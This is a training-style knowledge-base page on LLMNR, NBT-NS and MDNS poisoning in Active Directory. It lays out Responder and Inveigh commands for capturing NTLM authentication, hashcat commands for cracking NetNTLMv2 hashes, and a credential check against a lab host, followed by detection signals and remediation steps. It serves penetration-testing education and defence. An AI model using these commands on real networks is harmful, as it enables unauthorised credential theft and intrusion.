Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 01. Initial Access / Techniques

LLMNR NBNS Poisoning

LLMNR, NBT-NS, and MDNS poisoning abuses fallback name resolution.

When DNS cannot resolve a name, Windows may ask the local network. An attacker can answer and capture NTLM authentication.

It is a historically strong technique with caveats.

Nowadays, it is easily stopped by defenders and the other requirement is that the attacker needs to be on the same L2 as the victims.


Passive First

Listen without poisoning:

sudo responder -I eth0 -A

This shows whether hosts are sending LLMNR, NBT-NS, or MDNS traffic.

Useful signals:

LLMNR query for WPAD
NBT-NS query for a mistyped hostname
MDNS query from a workstation

Active Capture

Start Responder:

sudo responder -I eth0

If interface name differs:

ip addr
sudo responder -I tun0
sudo responder -I eth0

Captured hashes are written under the Responder logs directory.

Common file:

SMB-NTLMv2-SSP-*.txt

Trigger In A Lab

From a Windows host, access a hostname that DNS cannot resolve:

dir \\notrealhost\share

If fallback name resolution is enabled and Responder wins the race, the Windows host authenticates to the attacker.


Crack NetNTLMv2

Copy the captured hash into:

netntlmv2.hashes

Crack:

hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt --show

Validate cracked credentials:

nxc smb 10.10.10.200 -d ootw.local -u alice.wright -p 'StudentPass2026!'

Windows Inveigh

From a Windows foothold:

.\Inveigh.exe -NBNS Y -LLMNR Y -DNS Y -HTTP Y -SMB Y -Console Y -FileOutput Y

PowerShell variant:

Import-Module .\Inveigh.ps1
Invoke-Inveigh -NBNS Y -LLMNR Y -ConsoleOutput Y -FileOutput Y

Do not run Responder and Inveigh on the same segment at the same time.


Capture Versus Relay

This note covers capture and cracking.

Relay is a separate attack path. Relay requires choosing a target service and understanding signing, EPA, LDAP protections, and coercion. That belongs in the relay section.


Detection

Defenders look for:

  • LLMNR or NBT-NS responses from unusual hosts
  • victims connecting to unexpected SMB or HTTP listeners
  • Security 4648 explicit credential use
  • Security 4624 logons to unexpected systems
  • Sysmon 3 network connections to attacker IPs
  • Sysmon 22 DNS/fallback resolution artifacts
  • Responder or Inveigh execution

Remediation

  • disable LLMNR by GPO
  • disable NBT-NS on interfaces
  • disable WPAD where not required
  • enforce SMB signing to reduce relay impact
  • monitor rogue name resolution responses
  • fix DNS so clients do not fall back to broadcast resolution